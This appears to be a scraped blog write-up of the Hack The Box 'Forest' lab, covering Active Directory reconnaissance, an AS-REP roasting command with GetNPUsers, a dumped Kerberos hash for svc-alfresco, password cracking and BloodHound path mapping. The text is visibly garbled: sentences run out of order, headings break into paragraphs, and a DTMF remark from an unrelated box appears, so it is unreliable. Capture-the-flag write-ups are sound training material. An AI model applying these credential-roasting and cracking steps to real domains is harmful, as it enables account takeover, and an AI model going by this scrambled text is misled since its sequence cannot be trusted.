From the above figure, we can see that svc-alfresco is a member of the group Service Accounts which is a member of the group Privileged IT Accounts, which is a member of Account Operators.The full list of OSCP like machines compiled by TJNull can be found here.
Lets get started Reconnaissance Run the nmapAutomato r script to enumerate open ports and services running on those ports. If you know the serviceversion, please submit the following fingerprints at: Service detection performed. If you know the serviceversion, please submit the following fingerprint at: SF-Port53-TCP:V7.80I7D313Time5E6C3B75Px8664-pc-linux-gnur(DNSV SF:ersionBindReqTCP,20,0x1e0x06x81x040x01000000x07version SF:x04bind00x100x03); Service Info: Host: FOREST; OS: Windows; CPE: cpe:o:microsoft:windows Service detection performed. ![]() Since the Kerberos and LDAP services are running, chances are were dealing with a Windows Active Directory box. The nmap scan leaks the domain and hostname: htb.local and FOREST.htb.local. Similarly, the SMB OS nmap scan leaks the operating system: Windows Server 2016 Standard 14393. If we find credentials through SMB or LDAP, we can use these services to remotely connect to the box. Hack The Forest How To Do ThisIf you would like to see how to do this manually, refer to the Lightweight Writeup. Notice that it does leak first names, last names and addresses which are written in DTMF map format, which maps letters to their corresponding digits on the telephone keypad. However, before I start writing a script to convert the numbers to letters, Im going to enumerate other ports to see if I can get names from there. Well run enum4linux which is a tool for enumerating information from Windows and Samba systems. Its a wrapper around the Samba tools smbclient, rpclient, net and nmblookup. If Kerberos pre-authentication is disabled on any of the above accounts, we can use the GetNPUsers impacket script to send a dummy request for authentication. The Key Distribution Center (KDC) will then return a TGT that is encrypted with the users password. From there, we can take the encrypted TGT, run it through a password cracker and brute force the users password. When I first did this box, I assumed the Impacket script requires a username as a parameter and therefore ran the script on all the usernames that I found. However, it turns out that you can use the script to output both the vulnerable usernames and their corresponding encrypted TGTs. GetNPUsers.py htb.local -dc-ip 10.10.10.161 -request We get back the following result. The Kerberos pre-authentication option has been disabled for the user svc-alfresco and the KDC gave us back a TGT encrypted with the users password. Save the encrypted TGT in the file hash.txt. Hack The Forest Crack The PasswordDesktophtbforest cat hash.txt krb5asrepsvc-alfrescoHTB:4ca6507622ec86fa1a1c8e6ed6c9070f670b846a8ba6ee243b9cad85657328fdf5624df615750cf3eeaa364b04ae9225ecaff4cf8994bb71fd4c07c9d406c6c30b1a1f899bde7bb9eb4df3e83fa07fc4405994a1bbd7a9fb6105342f78e5ca1ae8797b136f1eaecebd11eefeec83062b0142081208ef51cc17cbecf1fa7a88fad24aee856a539668fb3b9eae917cb6efb57df72a533f893c715bb0216f63c6df345e66fe66777ecfe98c8b516c905d4a81c7e6a4b5d3a3779ddf1ccad98e062f9bfc40596b24bd7685892f4ce22d44dcbf9aa2594748f81e2b7cc369390fab61d8cc7e5eeb2b987e4e52c9fab5f9a184 Crack the password using John the Ripper. This is only possible because the WinRM and WSMan services are open (refer to nmap scan). Lets run bloodhound to see if there are any exploitable paths. First, download SharpHound.exe and setup a python server in the directory it resides in. If you dont have BloodHound installed on your machine, use the following command to install it. In the Queries tab, select the pre-built query Shortest Path from Owned Principals.
0 Comments
Leave a Reply. |
Details
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |